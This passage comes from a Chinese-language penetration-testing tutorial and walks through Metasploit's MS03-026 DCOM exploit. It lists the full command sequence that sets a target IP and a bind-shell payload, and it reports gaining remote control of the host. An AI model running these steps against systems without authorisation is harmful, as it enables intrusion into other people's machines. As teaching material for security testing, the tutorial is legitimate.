◆输入“info exploit/windows/dcerpc/ms03_026_dcom”指令,了解MS03_026_dcom利用程序的相关信息内容,如下图所示:
 |
| 图13 |
◆根据了解的MS03_026_dcom的相关信息,使用漏洞利用程序。
输入:use exploit/windows/dcerpc/ms03_026_dcom
查看利用程序需要设置的相关内容
输入:show options
设置攻击目的主机的IP地址
输入:set RHOST 10.0.0.31
设置加载的ShellCode程序
输入:set PAYLOAD generic/shell_bind_tcp
执行利用程序
输入:exploit
系统攻击成功,并获取远程主机的权限,如下图所示:
 |
| 图14 |
Metasploit会不定期更新可利用的漏洞程序,可以通过Online Update来进行升级。
由于Metasploit是国外的开源组织来维护,所以其中的exploit程序主要是针对国外语言的操作系统。对于中文操作系统的exploit程序,有些还需要进一步的修改。叶子会在以后的文章中来讨论怎样修改Metasploit的exploit程序内容。
上一页 1 2 3 4 
安全中国首页 > 文章中心 > 渗透技术